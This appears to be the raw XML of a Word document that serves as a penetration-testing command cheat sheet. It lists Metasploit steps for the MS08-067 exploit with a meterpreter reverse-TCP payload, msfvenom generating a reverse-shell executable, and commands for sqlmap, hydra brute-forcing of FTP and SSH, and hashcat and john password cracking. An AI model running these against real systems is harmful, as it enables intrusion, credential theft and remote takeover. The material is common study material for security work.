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079E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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF61F59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exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D8959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 RHOST &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2B0A74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 PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CC601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 LHOST &lt;local_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84E13E" w14:textId="62EB88EC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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0B921" w14:textId="2DFACFFA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0ED2D7B0" w14:textId="7354EFF1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searchsploit apache 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C85D5B5" w14:textId="55643C9F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01767EA0" w14:textId="621F4F6A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sqlmap -u "http://example.com/page?parameter=value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636805B" w14:textId="53E6FDA5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5F9D93EF" w14:textId="3B410E5E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49D0FE1F" w14:textId="03EAAB5A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joomscan -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="007C021E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>http://example-joomla-site.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CBC59E2" w14:textId="40D12A2A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6FF3F7E8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RHOST 192.168.1.10 # Target IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD9402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PAYLOAD windows/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E70697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LHOST 192.168.1.5 # Your IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B58C9" w14:textId="1EF49750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 LPORT 4444 # Your listening port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DA457" w14:textId="2B767400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7A4CE808" w14:textId="3331C42E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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe &gt; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CFDE1D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173FE79D" w14:textId="0C88DAC7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db_import /path/to/nmapscan.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793DBF69" w14:textId="50E5050C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7CFF7865" w14:textId="49DD6030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john --format=descrypt --wordlist=mydictionary.txt hashedpasswords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E183E6" w14:textId="2D39147D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01D3D67B" w14:textId="2B67FEB1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hydra -l user -P passlist.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007C021E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>ftp://192.168.x.x</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FA28BC4" w14:textId="29D8B246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793BF99F" w14:textId="64D33970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hashcat -m 0 -a 0 md5hashes.txt wordlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F72E1" w14:textId="00F6D884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18DCEAF7" w14:textId="100C0081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crunch 5 5 abcdefghijklmnop -o output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C1FA4" w14:textId="2FD6BB0F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5BD2F82D" w14:textId="1E7C2C2D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ftp &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB78175" w14:textId="46EE2771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396BEDE5" w14:textId="3259F9F9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hydra -l username -P passwordlist.txt ssh://&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D784FF" w14:textId="271605AD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12E48BED" w14:textId="4B01BBDA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enum4linux -a &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C907F20" w14:textId="6E69BBCC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695684C2" w14:textId="1A79F3B1" w:rsidR="004D6482" w:rsidRDefault="004D6482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snmpwalk -v2c -c public &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53869994" w14:textId="6DBE9928" w:rsidR="00132588" w:rsidRDefault="00132588" w:rsidP="004D6482">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44067DEE" w14:textId="1D3FBF35" w:rsidR="00132588" w:rsidRDefault="00132588" w:rsidP="004D64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nikto -h http://&lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530C3920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1503B257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34377B2A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49844B98" w14:textId="77777777" w:rsidR="004D6482" w:rsidRDefault="004D6482" w:rsidP="004D6482">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D386613" w14:textId="77777777" w:rsidR="00F33FB2" w:rsidRPr="004D6482" w:rsidRDefault="00132588" w:rsidP="004D6482">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F33FB2" w:rsidRPr="004D6482" w:rsidSect="00657E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82"/>
    <w:rsid w:val="00132588"/>
    <w:rsid w:val="004D6482"/>
    <w:rsid w:val="005415EA"/>
    <w:rsid w:val="005F23E0"/>
    <w:rsid w:val="00657E0B"/>
    <w:rsid w:val="008B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06B06"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{08041B87-D289-40E0-BFEF-44AEA4E8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48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6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192.168.x.x" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example-joomla-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reda</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>eman reda</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T16:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-22T16:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>